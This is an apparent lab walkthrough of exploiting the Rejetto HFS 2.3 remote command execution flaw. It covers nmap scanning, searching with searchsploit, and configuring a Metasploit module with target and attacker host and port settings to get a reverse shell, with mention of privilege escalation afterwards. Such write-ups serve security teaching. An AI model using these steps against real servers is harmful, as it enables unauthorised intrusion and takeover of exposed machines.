Rejetto HTTP File Server (HFS) 2.3

You can use HFS (HTTP File Server) to send and receive files.

It's different from classic file sharing because it uses web technology to be more compatible with today's Internet. It also differs from classic web servers because it's very easy to use and runs "right out-of-the-box". Access your remote files, over the network. It has been tested with Wine under Linux.


The findMacroMarker function in parserLib.pas in Rejetto HTTP File Server (aka HFS or HTTP Fileserver) 2.3x before 2.3c allows remote attackers to execute arbitrary programs via a %00 sequence in a search action.

Let's test it.


We will have an instance on HFS running in our victim host.

From our attacking machine we will do a simple nmap scan and check our open ports, we know the server is running on port 80 but as an attacker we usually go in blind (Black Box). As well we don't want to flood it with so much request so we can always use nmaps safe scripts to check our victim host in a proper way. Let's cheat on this example and run the scan just on port 80.

Let's imagine that this is a Public facing IP Address, and we find our Web Server running HFS, let's enumerate this service as we are currently unaware if there is even an exploit!!.


The first 3 searches shows us some promising results

Let's not go too far Offensive Security has this incredible tool to search for exploits locally on our machine with no internet [searchsploit].

What about the famous hacker framework Metasploit.

We can start the tool by running:sudo msfdb init && sudo msfconsole

This will initialize the metasploit database and initialize the framework, from here searching exploits is simple by just utilizing the "search" command: search rejetto

A great option we can use this tool to catch a shell immediately, we try to do this in a most efficient matter, why not use a tool that has been properly tested (Manual hackers out there).


With Metasploit we set our proper options to attack this machine and gain a shell. Usually we want to set the following variables

set RHOST <Target IP>
set RPORT <Target Port>
set LHOST <Attacker IP>
set LPORT <Attacker Port>

The rest is set to the proper port and path. Then we simply run the payload.

And we can see our permission from the machine with Metasploit try and Privesc and other good things on the machine. But this is just an example with how some public facing application can give the APT Initial Access to the Internal Network when this is facing the Public Internet.

Last updated